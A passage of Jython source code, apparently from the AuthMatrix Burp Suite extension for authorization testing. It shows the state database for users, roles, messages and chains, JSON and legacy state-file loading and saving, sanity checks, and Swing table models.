self.arrayOfUsers[userIndex].addRoleByIndex(roleIndex,prechecked)
self.lock.release()
return userIndex
# Returns the index of the role, whether it's new or not
def getOrCreateRole(self, role, newSingleUser=False):
self.lock.acquire()
roleIndex = -1
suffix = " (only)"
name = role+suffix if newSingleUser else role
if newSingleUser or name.endswith(suffix):
singleUser = True
else:
singleUser = False
# Check if Role already exists
for i in self.getActiveRoleIndexes():
if self.arrayOfRoles[i]._name == name:
roleIndex = i
# Add new Role
if roleIndex < 0:
roleIndex = self.arrayOfRoles.size()
newColumn = roleIndex-self.deletedRoleCount
# Insert column if not singleuser and increment singleuser columns
if not singleUser:
newColumn -= self.getActiveSingleUserRoleCount()
for i in self.getActiveSingleUserRoleIndexes():
# NOTE this must be changed if reordering of roles is added
curColumn = self.arrayOfRoles[i].getColumn()
assert(curColumn >= newColumn)
self.arrayOfRoles[i].setColumn(curColumn+1)
self.arrayOfRoles.add(RoleEntry(roleIndex,
newColumn,
name,
singleUser=singleUser))
# Add new role to each existing user as unchecked except the singleUser
for userIndex in self.getActiveUserIndexes():
prechecked = False
if singleUser and self.arrayOfUsers[userIndex]._name == name[:-len(suffix)]:
prechecked=True
self.arrayOfUsers[userIndex].addRoleByIndex(roleIndex, prechecked)
# Add new role to each existing message as unchecked
for messageIndex in self.getActiveMessageIndexes():
self.arrayOfMessages[messageIndex].addRoleByIndex(roleIndex)
self.lock.release()
return roleIndex
# Returns the Row of the new message
# Unlike Users and Roles, allow duplicate messages
def createNewMessage(self,messagebuffer,name,regex):
self.lock.acquire()
messageIndex = self.arrayOfMessages.size()
self.arrayOfMessages.add(MessageEntry(messageIndex, messageIndex - self.deletedMessageCount, messagebuffer, name, regex=regex))
# Add all existing roles as unchecked
for roleIndex in self.getActiveRoleIndexes():
self.arrayOfMessages[messageIndex].addRoleByIndex(roleIndex)
# Add regex to array if it's new
if regex and regex not in self.arrayOfRegexes:
self.arrayOfRegexes.append(regex)
self.lock.release()
return messageIndex
def createNewChain(self):
self.lock.acquire()
chainIndex = self.arrayOfChains.size()
# Handle Example
if chainIndex == 0:
self.arrayOfChains.add(ChainEntry(
chainIndex,
chainIndex - self.deletedChainCount,
"Example",
"",
"StartAfter(.*?)EndAt",
"",
"StartAfter(.*?)EndAt"))
else:
self.arrayOfChains.add(ChainEntry(chainIndex, chainIndex - self.deletedChainCount))
self.lock.release()
return chainIndex
def clear(self):
self.lock.acquire()
self.arrayOfMessages = ArrayList()
self.arrayOfRoles = ArrayList()
self.arrayOfUsers = ArrayList()
self.arrayOfChains = ArrayList()
self.deletedUserCount = 0
self.deletedRoleCount = 0
self.deletedMessageCount = 0
self.deletedChainCount = 0
self.arrayOfSVs = ArrayList()
self.headerCount = 0
self.arrayOfRegexes = []
self.lock.release()
def loadLegacy(self, fileName, extender):
from java.io import ObjectOutputStream;
from java.io import FileOutputStream;
from java.io import ObjectInputStream;
from java.io import FileInputStream;
FAILURE_REGEX_SERIALIZE_CODE = "|AUTHMATRIXFAILUREREGEXPREFIX|"
AUTHMATRIX_SERIALIZE_CODE = "|AUTHMATRIXCOOKIEHEADERSERIALIZECODE|"
ins = ObjectInputStream(FileInputStream(fileName))
db=ins.readObject()
ins.close()
self.lock.acquire()
self.arrayOfUsers = ArrayList()
self.arrayOfRoles = ArrayList()
self.arrayOfMessages = ArrayList()
self.arrayOfChains = ArrayList()
self.deletedUserCount = db.deletedUserCount
self.deletedRoleCount = db.deletedRoleCount
self.deletedMessageCount = db.deletedMessageCount
self.deletedChainCount = 0 # Updated with chain entries below in arrayOfUsers
self.arrayOfSVs = ArrayList()
self.headerCount = 1 # Legacy states had one header only
self.arrayOfRegexes = []
for message in db.arrayOfMessages:
if message._successRegex.startswith(FAILURE_REGEX_SERIALIZE_CODE):
regex = message._successRegex[len(FAILURE_REGEX_SERIALIZE_CODE):]
failureRegexMode=True
else:
regex = message._successRegex
failureRegexMode=False
messageEntry = RequestResponseStored(extender, message._host, message._port, message._protocol, message._requestData)
self.arrayOfMessages.add(MessageEntry(
message._index,
message._tableRow,
messageEntry,
message._name, message._roles, regex, message._deleted, failureRegexMode))
for role in db.arrayOfRoles:
self.arrayOfRoles.add(RoleEntry(
role._index,
role._mTableColumn-3, # NOTE this is done to preserve compatibility with older state files
role._name,
role._deleted))
for user in db.arrayOfUsers:
# NOTE: to preserve backwards compatibility, chains are stored here in a really hacky way
if type(user._roles) == int:
# Chain
self.deletedChainCount = user._roles
name=""
sourceUser=""
if user._name:
namesplit = user._name.split(AUTHMATRIX_SERIALIZE_CODE)
name=namesplit[0]
if len(namesplit)>1:
sourceUser=namesplit[1]
token = user._token.split(AUTHMATRIX_SERIALIZE_CODE)
assert(len(token)==2)
fromID = token[0]
fromRegex = token[1]
staticcsrf = user._staticcsrf.split(AUTHMATRIX_SERIALIZE_CODE)
assert(len(staticcsrf)==2)
toID = staticcsrf[0]
toRegex = staticcsrf[1]
self.arrayOfChains.add(ChainEntry(
int(user._index),
int(user._tableRow),
name,
fromID,
fromRegex,
toID,
toRegex,
user._deleted,
sourceUser
))
else:
# Normal User
token = [""] if not user._token else user._token.split(AUTHMATRIX_SERIALIZE_CODE)
cookies = token[0]
header = "" if len(token)==1 else token[1]
name = "" if not user._name else user._name
self.arrayOfUsers.add(UserEntry(
int(user._index),
int(user._tableRow),
name,
user._roles,
user._deleted,
cookies,
headers=[header]))
self.lock.release()
def loadJson(self, jsonText, extender):
# NOTE: Weird issue where saving serialized json for configs loaded from old states (pre v0.6.3)
# doesn't use correct capitalization on bools.
# This replacement might have weird results, but most are mitigated by using base64 encoding
jsonFixed = jsonText.replace(": False",": false").replace(": True",": true")
# Strip /* */ comments
jsonFixed = re.sub(r"[/][*]([^*]|([*][^/]))*[*][/]", "", jsonFixed, 0, re.MULTILINE)
try:
stateDict = json.loads(jsonFixed)
except:
print jsonFixed
traceback.print_exc(file=extender._callbacks.getStderr())
return
version = stateDict["version"]
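# NOTE: versions are compared as strings, so the ordering is lexicographic;
# this matches numeric ordering only while each version component stays a
# single digit (e.g. "0.10" < "0.9" as strings)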
if version > AUTHMATRIX_VERSION:
print "Invalid Version in State File ("+version+")"
return
backupState = self.getSaveableJson()
self.lock.acquire()
try:
# NOTE: As of 0.8, if the state file is missing an element, it is assumed the user
# did not intend to modify that array, so small pieces of state can be updated individually.
# NOTE: As of 0.8 the deleted counts and header counts are filled in using the values found in each array
# TODO (0.9): every field that has "{int(x" is using an ID in the state that is not obvious to the user
if "arrayOfRoles" in stateDict:
self.arrayOfRoles = ArrayList()
self.deletedRoleCount = 0
# (self,index,columnIndex,name,deleted=False,singleUser=False):
for roleEntry in stateDict["arrayOfRoles"]:
deleted = False if "deleted" not in roleEntry else roleEntry["deleted"]
if deleted:
self.deletedRoleCount += 1
self.arrayOfRoles.add(RoleEntry(
roleEntry["index"],
roleEntry["column"],
roleEntry["name"],
deleted = deleted,
singleUser = False if version < "0.7" or "singleUser" not in roleEntry else roleEntry["singleUser"]
))
if "arrayOfUsers" in stateDict:
self.arrayOfUsers = ArrayList()
self.deletedUserCount = 0
self.headerCount = 0
self.arrayOfSVs = ArrayList()
# NOTE: leaving out chainResults
# (self, index, tableRow, name, roles = {}, deleted=False, cookies="", headers = [], enabled = True):
for userEntry in stateDict["arrayOfUsers"]:
deleted = False if "deleted" not in userEntry else userEntry["deleted"]
if deleted:
self.deletedUserCount += 1
# Support old and new header versions
if "headersBase64" in userEntry:
headers = [base64.b64decode(x) for x in userEntry["headersBase64"]]
# Grab the number of headers. Sanity check will later confirm that each user has the right number of headers
if self.headerCount == 0:
self.headerCount = len(headers)
elif "headerBase64" in userEntry:
self.headerCount = 1
headers = [base64.b64decode(userEntry["headerBase64"])]
else:
headers = [""]*self.headerCount
self.arrayOfUsers.add(UserEntry(
userEntry["index"],
userEntry["tableRow"],
userEntry["name"],
{int(x): userEntry["roles"][x] for x in userEntry["roles"].keys()}, # convert keys to ints
deleted = deleted,
cookies = "" if "cookiesBase64" not in userEntry else base64.b64decode(userEntry["cookiesBase64"]),
headers = headers,
enabled = True if "enabled" not in userEntry else userEntry["enabled"]
))
# Update Static Values
keyword = "arrayOfChainSources" if version >= "0.8" else "arrayOfSVs"
if keyword in stateDict:
for svEntry in stateDict[keyword]:
# If the index does not match an active user, do not include it
self.arrayOfSVs.add(SVEntry(
svEntry["name"],
{int(x): svEntry["userValues"][x] for x in svEntry["userValues"].keys() if int(x) in self.getActiveUserIndexes()}, # convert keys to ints
))
if "arrayOfMessages" in stateDict:
self.arrayOfMessages = ArrayList()
self.deletedMessageCount = 0
self.arrayOfRegexes = []
# NOTE leaving out roleResults and userRuns (need to convert keys)
# (self, index, tableRow, requestResponse, name = "", roles = {}, regex = "", deleted = False, failureRegexMode = False, enabled = True):
for messageEntry in stateDict["arrayOfMessages"]:
deleted = False if "deleted" not in messageEntry else messageEntry["deleted"]
if deleted:
self.deletedMessageCount += 1
regex = "" if "regexBase64" not in messageEntry else base64.b64decode(messageEntry["regexBase64"]).decode("utf-8")
if regex and regex not in self.arrayOfRegexes:
self.arrayOfRegexes.append(regex)
requestResponse = None if deleted else RequestResponseStored(
extender,
messageEntry["host"],
messageEntry["port"],
messageEntry["protocol"],
StringUtil.toBytes((base64.b64decode(messageEntry["requestBase64"])).decode("utf-8")))
self.arrayOfMessages.add(MessageEntry(
messageEntry["index"],
messageEntry["tableRow"],
requestResponse,
messageEntry["name"],
{int(x): messageEntry["roles"][x] for x in messageEntry["roles"].keys()}, # convert keys to ints
regex = regex,
deleted = deleted,
failureRegexMode = False if "failureRegexMode" not in messageEntry else messageEntry["failureRegexMode"],
enabled = True if "enabled" not in messageEntry else messageEntry["enabled"]
))
if "arrayOfChains" in stateDict:
self.arrayOfChains = ArrayList()
self.deletedChainCount = 0
# NOTE: leaving out fromStart, fromEnd, toStart, toEnd
for chainEntry in stateDict["arrayOfChains"]:
deleted = False if "deleted" not in chainEntry else chainEntry["deleted"]
if deleted:
self.deletedChainCount += 1
self.arrayOfChains.add(ChainEntry(
chainEntry["index"],
chainEntry["tableRow"],
name = "" if "name" not in chainEntry else chainEntry["name"],
fromID = "" if "fromID" not in chainEntry else chainEntry["fromID"],
fromRegex = "" if "fromRegexBase64" not in chainEntry else base64.b64decode(chainEntry["fromRegexBase64"]).decode("utf-8"),
toID = "" if "toID" not in chainEntry else chainEntry["toID"],
toRegex = "" if "toRegexBase64" not in chainEntry else base64.b64decode(chainEntry["toRegexBase64"]).decode("utf-8"),
deleted = deleted,
sourceUser = -1 if "sourceUser" not in chainEntry else chainEntry["sourceUser"],
enabled = True if "enabled" not in chainEntry else chainEntry["enabled"],
transformers = [] if "transformers" not in chainEntry else chainEntry["transformers"]
))
except:
self.lock.release()
print "Corrupt State File: Reverting back to original. (See stderr for more detail)"
traceback.print_exc(file=extender._callbacks.getStderr())
self.loadJson(backupState,extender)
return
self.lock.release()
# Sanity checks
sanityResult = self.sanityCheck(extender)
if sanityResult:
print "Error parsing state file: "+sanityResult
# Revert to the backup state
self.loadJson(backupState,extender)
def sanityCheck(self, extender):
# Returns an error string if the DB is in a corrupt state, else returns None
try:
userIndexes = self.getActiveUserIndexes()
roleIndexes = self.getActiveRoleIndexes()
messageIndexes = self.getActiveMessageIndexes()
chainIndexes = self.getActiveChainIndexes()
# Index Checks
for indexes, currentArray, deletedCount in [
(userIndexes, self.arrayOfUsers, self.deletedUserCount),
(roleIndexes, self.arrayOfRoles, self.deletedRoleCount),
(messageIndexes, self.arrayOfMessages, self.deletedMessageCount),
(chainIndexes, self.arrayOfChains, self.deletedChainCount)]:
# Check that indexes are all unique
if len(indexes) > len(set(indexes)):
return "Not All Indexes are Unique."
# Check that the DB array has the correct number of items
if len(currentArray) != len(indexes) + deletedCount:
return "Array found with incorrect number of items."
for currentIndex in indexes:
if currentIndex < 0:
return "Negative Index Found."
# Check that all index values are below the length of active+deleted
if currentIndex >= len(indexes)+deletedCount:
return "Index Higher than Total Active + Deleted."
# Check that the indexes within the array match the index of the Entry
if currentIndex != currentArray[currentIndex]._index:
return "Entries in the State File Arrays must be in order by index"
# Row Checks
for indexes, currentArray in [
(userIndexes, self.arrayOfUsers),
(messageIndexes, self.arrayOfMessages),
(chainIndexes, self.arrayOfChains)]:
rowList = [currentArray[currentIndex].getTableRow() for currentIndex in indexes]
# Check that the rows for a given table are all unique
if len(rowList) > len(set(rowList)):
return "Not all rows for a given table are unique."
for row in rowList:
# Check that rows are within appropriate bounds
if row >= len(indexes) or row <0:
return "Row out of bounds."
# Column Checks
columnList = [self.arrayOfRoles[currentIndex].getColumn() for currentIndex in roleIndexes]
if len(columnList) > len(set(columnList)):
return "Not all columns for Roles array are unique."
for column in columnList:
if column < 0 or column >= len(roleIndexes):
return "Column out of bounds."
# Custom Headers checks
for userIndex in userIndexes:
if len(self.arrayOfUsers[userIndex]._headers) != self.headerCount:
return "Incorrect Number of Headers for a User. Must be "+str(self.headerCount)
# Role Assignment Checks
for indexes, currentArray in [
(userIndexes, self.arrayOfUsers),
(messageIndexes, self.arrayOfMessages)]:
for index in indexes:
# Check that all keys are unique (might be redundant)
roleKeys = currentArray[index]._roles.keys()
if len(roleKeys) > len(set(roleKeys)):
return "Duplicate Keys on Roles Map"
# Check that all active roles are covered in that items map
for roleIndex in roleIndexes:
if roleIndex not in roleKeys:
return "Missing a Role Value in a Message or User"
# NOTE: Skipping Static Value check because a missing SV is handled gracefully
# TODO (0.9): check fromID and sourceUser in Chain
except:
traceback.print_exc(file=extender._callbacks.getStderr())
return "Unidentified"
return None
def getSaveableJson(self):
stateDict = {"version":AUTHMATRIX_VERSION}
stateDict["arrayOfRoles"] = []
for roleEntry in self.arrayOfRoles:
deleted = roleEntry._deleted
stateDict["arrayOfRoles"].append({
"index":roleEntry._index,
"name":roleEntry._name if not deleted else None,
"deleted":deleted,
"column":roleEntry._column if not deleted else None,
"singleUser":roleEntry._singleUser if not deleted else None
})
stateDict["arrayOfUsers"] = []
for userEntry in self.arrayOfUsers:
deleted = userEntry._deleted
stateDict["arrayOfUsers"].append({
"index":userEntry._index,
"name":userEntry._name if not deleted else None,
"roles":userEntry._roles if not deleted else {},
"deleted":deleted,
"enabled":userEntry._enabled,
"tableRow":userEntry._tableRow if not deleted else None,
"cookiesBase64":base64.b64encode(userEntry._cookies.encode("utf-8")) if userEntry._cookies and not deleted else "",
"headersBase64":[base64.b64encode(x.encode("utf-8")) if x else "" for x in userEntry._headers] if not deleted else [],
"chainResults":userEntry._chainResults if not deleted else {}
})
stateDict["arrayOfMessages"] = []
for messageEntry in self.arrayOfMessages:
deleted = messageEntry._deleted
stateDict["arrayOfMessages"].append({
"index":messageEntry._index,
"tableRow":messageEntry._tableRow if not deleted else None,
"requestBase64":base64.b64encode(StringUtil.fromBytes(messageEntry._requestResponse.getRequest()).encode("utf-8")) if not deleted else None,
"host":messageEntry._requestResponse.getHttpService().getHost() if not deleted else None,
"port":messageEntry._requestResponse.getHttpService().getPort() if not deleted else None,
"protocol":messageEntry._requestResponse.getHttpService().getProtocol() if not deleted else None,
"name":messageEntry._name if not deleted else None,
"roles":messageEntry._roles if not deleted else {},
"regexBase64":base64.b64encode(messageEntry._regex.encode("utf-8")) if messageEntry._regex and not deleted else "",
"deleted":deleted,
"enabled":messageEntry._enabled,
"failureRegexMode":messageEntry._failureRegexMode if not deleted else None,
"runBase64ForUserID":{int(x): {
"request": None if not messageEntry._userRuns[x] or not messageEntry._userRuns[x].getRequest() else base64.b64encode(StringUtil.fromBytes(messageEntry._userRuns[x].getRequest()).encode("utf-8")),
"response": None if not messageEntry._userRuns[x] or not messageEntry._userRuns[x].getResponse() else base64.b64encode(StringUtil.fromBytes(messageEntry._userRuns[x].getResponse()).encode("utf-8"))}
for x in messageEntry._userRuns.keys()} if not deleted else {},
"runResultForRoleID":messageEntry._roleResults if not deleted else {}
})
stateDict["arrayOfChains"] = []
for chainEntry in self.arrayOfChains:
deleted = chainEntry._deleted
stateDict["arrayOfChains"].append({
"index":chainEntry._index,
"fromID":chainEntry._fromID if not deleted else None,
"fromRegexBase64":base64.b64encode(chainEntry._fromRegex.encode("utf-8")) if chainEntry._fromRegex and not deleted else "",
"toID":chainEntry._toID if not deleted else None,
"toRegexBase64":base64.b64encode(chainEntry._toRegex.encode("utf-8")) if chainEntry._toRegex and not deleted else "",
"deleted":deleted,
"enabled":chainEntry._enabled,
"tableRow":chainEntry._tableRow if not deleted else None,
"name":chainEntry._name if not deleted else None,
"sourceUser":chainEntry._sourceUser if not deleted else None,
"fromStart":chainEntry._fromStart if not deleted else None,
"fromEnd":chainEntry._fromEnd if not deleted else None,
"toStart":chainEntry._toStart if not deleted else None,
"toEnd":chainEntry._toEnd if not deleted else None,
"transformers":chainEntry._transformers if not deleted else []
})
stateDict["arrayOfChainSources"] = []
for SVEntry in self.arrayOfSVs:
stateDict["arrayOfChainSources"].append({
"name":SVEntry._name,
"userValues":SVEntry._userValues
})
# BUG: this is not using the correct capitalization on booleans after loading legacy states
return json.dumps(stateDict)
def getActiveUserIndexes(self):
return [x._index for x in self.arrayOfUsers if not x.isDeleted()]
def getActiveRoleIndexes(self):
return [x._index for x in self.arrayOfRoles if not x.isDeleted()]
def getActiveSingleUserRoleIndexes(self):
return [x._index for x in self.arrayOfRoles if x.isSingleUser() and not x.isDeleted()]
def getActiveMessageIndexes(self):
return [x._index for x in self.arrayOfMessages if not x.isDeleted()]
def getActiveChainIndexes(self):
return [x._index for x in self.arrayOfChains if not x.isDeleted()]
def getActiveUserCount(self):
ret = self.arrayOfUsers.size()-self.deletedUserCount
assert(ret == len(self.getActiveUserIndexes()))
return ret
def getActiveRoleCount(self):
ret = self.arrayOfRoles.size()-self.deletedRoleCount
assert(ret == len(self.getActiveRoleIndexes()))
return ret
def getActiveMessageCount(self):
ret = self.arrayOfMessages.size()-self.deletedMessageCount
assert(ret == len(self.getActiveMessageIndexes()))
return ret
def getActiveSingleUserRoleCount(self):
return len(self.getActiveSingleUserRoleIndexes())
def getActiveChainCount(self):
return self.arrayOfChains.size()-self.deletedChainCount
def getMessageByRow(self, row):
for messageEntry in [self.arrayOfMessages[i] for i in self.getActiveMessageIndexes()]:
if messageEntry.getTableRow() == row:
return messageEntry
def getUserByRow(self, row):
for userEntry in [self.arrayOfUsers[i] for i in self.getActiveUserIndexes()]:
if userEntry.getTableRow() == row:
return userEntry
def getRoleByColumn(self,column, table):
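# Role columns sit after the static columns: 3 static columns in the message
# table ('m'), or the static user columns plus one column per custom header
# and per chain source (SV) in the user table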
startingIndex = self.STATIC_MESSAGE_TABLE_COLUMN_COUNT if table == "m" else self.STATIC_USER_TABLE_COLUMN_COUNT+self.headerCount+self.arrayOfSVs.size()
for roleEntry in [self.arrayOfRoles[i] for i in self.getActiveRoleIndexes()]:
if roleEntry.getColumn()+startingIndex == column:
return roleEntry
def getChainByRow(self, row):
for chainEntry in [self.arrayOfChains[i] for i in self.getActiveChainIndexes()]:
if chainEntry.getTableRow() == row:
return chainEntry
def deleteUser(self,userIndex):
self.lock.acquire()
userEntry = self.arrayOfUsers[userIndex]
if userEntry:
userEntry.setDeleted()
self.deletedUserCount += 1
previousRow = userEntry.getTableRow()
for user in [self.arrayOfUsers[i] for i in self.getActiveUserIndexes()]:
if user.getTableRow()>previousRow:
user.setTableRow(user.getTableRow()-1)
# TODO maybe delete SingleUser role too (though it might be worth leaving if the user has boxes checked)
self.lock.release()
def deleteRole(self,roleIndex):
self.lock.acquire()
roleEntry = self.arrayOfRoles[roleIndex]
if roleEntry:
roleEntry.setDeleted()
self.deletedRoleCount += 1
previousColumn = roleEntry.getColumn()
for role in [self.arrayOfRoles[i] for i in self.getActiveRoleIndexes()]:
if role.getColumn()>previousColumn:
role.setColumn(role.getColumn()-1)
self.lock.release()
def deleteMessage(self,messageIndex):
self.lock.acquire()
messageEntry = self.arrayOfMessages[messageIndex]
if messageEntry:
messageEntry.setDeleted()
self.deletedMessageCount += 1
previousRow = messageEntry.getTableRow()
for message in [self.arrayOfMessages[i] for i in self.getActiveMessageIndexes()]:
if message.getTableRow()>previousRow:
message.setTableRow(message.getTableRow()-1)
self.lock.release()
def setToggleForRole(self, messageIndex, roleIndex, enabled):
self.lock.acquire()
messageEntry = self.arrayOfMessages[messageIndex]
messageEntry.setToggleForRoleByIndex(roleIndex, enabled)
self.lock.release()
def deleteChain(self,chainIndex):
self.lock.acquire()
chainEntry = self.arrayOfChains[chainIndex]
if chainEntry:
chainEntry.setDeleted()
self.deletedChainCount += 1
previousRow = chainEntry.getTableRow()
for chain in [self.arrayOfChains[i] for i in self.getActiveChainIndexes()]:
if chain.getTableRow()>previousRow:
chain.setTableRow(chain.getTableRow()-1)
self.lock.release()
def getMessagesInOrderByRow(self):
messages = []
for i in range(self.getActiveMessageCount()):
messages.append(self.getMessageByRow(i))
return messages
def getUsersInOrderByRow(self):
users = []
for i in range(self.getActiveUserCount()):
users.append(self.getUserByRow(i))
return users
def moveMessageToRow(self, fromRow, toRow):
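# Moves the message at fromRow up or down, shifting the rows in between by
# one; e.g. fromRow=3, toRow=0 puts that message at row 0 and pushes rows
# 0-2 down to 1-3 (moving down lands at toRow-1)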
self.lock.acquire()
messages = self.getMessagesInOrderByRow()
if fromRow > toRow:
messages[fromRow].setTableRow(toRow)
for i in range(toRow,fromRow):
messages[i].setTableRow(i+1)
elif toRow > fromRow:
messages[fromRow].setTableRow(toRow-1)
for i in range(fromRow+1,toRow):
messages[i].setTableRow(i-1)
self.lock.release()
def moveUserToRow(self, fromRow, toRow):
self.lock.acquire()
users = self.getUsersInOrderByRow()
if fromRow > toRow:
users[fromRow].setTableRow(toRow)
for i in range(toRow,fromRow):
users[i].setTableRow(i+1)
elif toRow > fromRow:
users[fromRow].setTableRow(toRow-1)
for i in range(fromRow+1,toRow):
users[i].setTableRow(i-1)
self.lock.release()
def clearAllChainResults(self):
for i in self.getActiveUserIndexes():
self.arrayOfUsers[i].clearChainResults()
def getUserByName(self, name):
for i in self.getActiveUserIndexes():
if self.arrayOfUsers[i]._name == name:
return self.arrayOfUsers[i]
def getRoleByName(self, name):
for i in self.getActiveRoleIndexes():
if self.arrayOfRoles[i]._name == name:
return self.arrayOfRoles[i]
def addNewSV(self, name):
if not self.getSVByName(name):
self.lock.acquire()
newSVEntry = SVEntry(name)
self.arrayOfSVs.add(newSVEntry)
self.lock.release()
return newSVEntry
def getSVByName(self, name):
for sv in self.arrayOfSVs:
if sv._name == name:
return sv
return None
def deleteSV(self, index):
if index >=0 and index<self.arrayOfSVs.size():
self.lock.acquire()
self.arrayOfSVs.remove(self.arrayOfSVs[index])
self.lock.release()
def addNewHeader(self):
self.headerCount += 1
for userEntry in [self.arrayOfUsers[i] for i in self.getActiveUserIndexes()]:
userEntry._headers.append("")
assert(len(userEntry._headers)==self.headerCount)
def deleteHeader(self,index):
if index >=0 and index <self.headerCount:
self.headerCount -= 1
for userEntry in [self.arrayOfUsers[i] for i in self.getActiveUserIndexes()]:
userEntry._headers.pop(index)
assert(len(userEntry._headers)==self.headerCount)
return True
return False
##
## Tables and Table Models
##
class UserTableModel(AbstractTableModel):
def __init__(self, extender):
self._extender = extender
self._db = extender._db
def getRowCount(self):
return self._db.getActiveUserCount()
def getColumnCount(self):
return (self._db.STATIC_USER_TABLE_COLUMN_COUNT
+self._db.headerCount
+self._db.arrayOfSVs.size()
+self._db.getActiveRoleCount()
-self._db.getActiveSingleUserRoleCount())
def getColumnName(self, columnIndex):
headerIndex = columnIndex-self._db.STATIC_USER_TABLE_COLUMN_COUNT
svIndex = headerIndex - self._db.headerCount
if columnIndex == 0:
return "User Name"
elif columnIndex == 1:
return "Cookies"
elif headerIndex >=0 and headerIndex<self._db.headerCount:
return "HTTP Header"
elif svIndex >= 0 and svIndex < self._db.arrayOfSVs.size():
return self._db.arrayOfSVs[svIndex]._name
else:
roleEntry = self._db.getRoleByColumn(columnIndex, 'u')
if roleEntry:
return roleEntry._name
return ""
def getValueAt(self, rowIndex, columnIndex):
userEntry = self._db.getUserByRow(rowIndex)
headerIndex = columnIndex-self._db.STATIC_USER_TABLE_COLUMN_COUNT
svIndex = headerIndex - self._db.headerCount
if userEntry:
if columnIndex == 0:
return userEntry._name
elif columnIndex == 1:
return userEntry._cookies
elif headerIndex >=0 and headerIndex<self._db.headerCount:
return userEntry._headers[headerIndex]
elif svIndex >= 0 and svIndex < self._db.arrayOfSVs.size():
return self._db.arrayOfSVs[svIndex].getValueForUserIndex(userEntry._index)
else:
roleEntry = self._db.getRoleByColumn(columnIndex, 'u')
if roleEntry:
roleIndex = roleEntry._index
return roleIndex in userEntry._roles and userEntry._roles[roleIndex]
return ""
def addRow(self, row):
self.fireTableRowsInserted(row,row)
def setValueAt(self, val, row, col):
# NOTE: testing if .locked is ok here since it's a manual operation
if self._db.lock.locked():
return
userEntry = self._db.getUserByRow(row)
headerIndex = col-self._db.STATIC_USER_TABLE_COLUMN_COUNT
svIndex = headerIndex - self._db.headerCount
if userEntry:
if col == 0:
# Verify user name does not already exist
if not self._db.getUserByName(val):
# Rename SingleUser role too
roleEntry = self._db.getRoleByName(userEntry._name+" (only)")
if roleEntry:
roleEntry._name = val+" (only)"
userEntry._name = val
elif col == 1:
userEntry._cookies = val
elif headerIndex >=0 and headerIndex<self._db.headerCount:
userEntry._headers[headerIndex] = val
elif svIndex >= 0 and svIndex < self._db.arrayOfSVs.size():
self._db.arrayOfSVs[svIndex].setValueForUserIndex(userEntry._index, val)
else:
roleIndex = self._db.getRoleByColumn(col, 'u')._index
userEntry.addRoleByIndex(roleIndex, val)
self.fireTableCellUpdated(row,col)
# Refresh dropdown menu for Chains and SingleUser Role names for Messages
self._extender._chainTable.redrawTable()
self._extender._messageTable.redrawTable()
# Set checkboxes and role editable
def isCellEditable(self, row, col):
return True
# Create checkboxes
def getColumnClass(self, columnIndex):
if columnIndex < self._db.STATIC_USER_TABLE_COLUMN_COUNT+self._db.headerCount+self._db.arrayOfSVs.size():
return str
else:
return Boolean
class UserTable(JTable):
def __init__(self, model):
self.setModel(model)
return
def redrawTable(self):
# NOTE: this is probably inefficient, but it should catch all changes to the table
self.getModel().fireTableStructureChanged()
self.getModel().fireTableDataChanged()
# User Name
self.getColumnModel().getColumn(0).setMinWidth(150)
self.getColumnModel().getColumn(0).setMaxWidth(1000)
# Cookie
self.getColumnModel().getColumn(1).setMinWidth(150)
self.getColumnModel().getColumn(1).setMaxWidth(1500)
self.getTableHeader().getDefaultRenderer().setHorizontalAlignment(JLabel.CENTER)
class MessageTableModel(AbstractTableModel):
def __init__(self, extender):
self._extender = extender
self._db = extender._db
def getRowCount(self):
return self._db.getActiveMessageCount()
def getColumnCount(self):
return self._db.getActiveRoleCount()+self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "ID"
elif columnIndex == 1:
return "Request Name"
elif columnIndex == 2:
return "Response Regex"
else:
roleEntry = self._db.getRoleByColumn(columnIndex, 'm')
if roleEntry:
return roleEntry._name
# TODO (0.9): Maybe show the index here to help with constructing state files?
#return roleEntry._name+" (#"+str(roleEntry._index)+")"
return ""
def getValueAt(self, rowIndex, columnIndex):
messageEntry = self._db.getMessageByRow(rowIndex)
if messageEntry:
if columnIndex == 0:
return str(messageEntry._index)
elif columnIndex == 1:
return messageEntry._name
elif columnIndex == 2:
return messageEntry._regex
else:
roleEntry = self._db.getRoleByColumn(columnIndex, 'm')
if roleEntry:
roleIndex = roleEntry._index
return roleIndex in messageEntry._roles and messageEntry._roles[roleIndex]
return ""
def addRow(self, row):
self.fireTableRowsInserted(row,row)
def setValueAt(self, val, row, col):
# NOTE: testing if .locked is ok here since it's a manual operation
if self._db.lock.locked():
return
messageEntry = self._db.getMessageByRow(row)
if messageEntry:
if col == self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT-2:
messageEntry._name = val
elif col == self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT-1:
messageEntry._regex = val
# Add this value to the array
if val and val not in self._db.arrayOfRegexes:
self._db.arrayOfRegexes.append(val)
# TODO (0.9): Remove unused Regexes from that list
else:
roleIndex = self._db.getRoleByColumn(col, 'm')._index
messageEntry.addRoleByIndex(roleIndex,val)
self.fireTableCellUpdated(row,col)
# Update the checkbox result colors since there was a change
if col >= self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT-1:
messageEntry.clearResults()
for i in range(self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT, self.getColumnCount()):
self.fireTableCellUpdated(row,i)
# Backup option
# Update entire table since it affects color
# self.fireTableDataChanged()
# Refresh table so that combobox updates
self._extender._messageTable.redrawTable()
# Set checkboxes editable
def isCellEditable(self, row, col):
# Include regex
if col >= self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT-2:
return True
return False
# Create checkboxes
def getColumnClass(self, columnIndex):
if columnIndex < self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT:
return str
else:
return Boolean
class MessageTable(JTable):
def __init__(self, model):
self.setModel(model)
self._extender = model._extender
self._viewerMap = {}
return
def changeSelection(self, row, col, toggle, extend):
# show the message entry for the selected row
selectedMessage = self.getModel()._db.getMessageByRow(row)
# Update messages with any user edits to original requests:
self.updateMessages()
self._extender._tabs.removeAll()
# NOTE: testing if .locked is ok here since it's a manual operation
if self.getModel()._db.lock.locked():
# Provide some feedback on a click
self.redrawTable()
return
# Create original Request tab and set default tab to Request
# Then Create test tabs and set the default tab to Response for easy analysis
originalTab = self.createRequestTabs(selectedMessage._requestResponse, True, selectedMessage._index)
originalTab.setSelectedIndex(0)
self._extender._tabs.addTab("Original",originalTab)
for userEntry in self.getModel()._db.getUsersInOrderByRow():
if userEntry._index in selectedMessage._userRuns.keys():
tabname = str(userEntry._name)
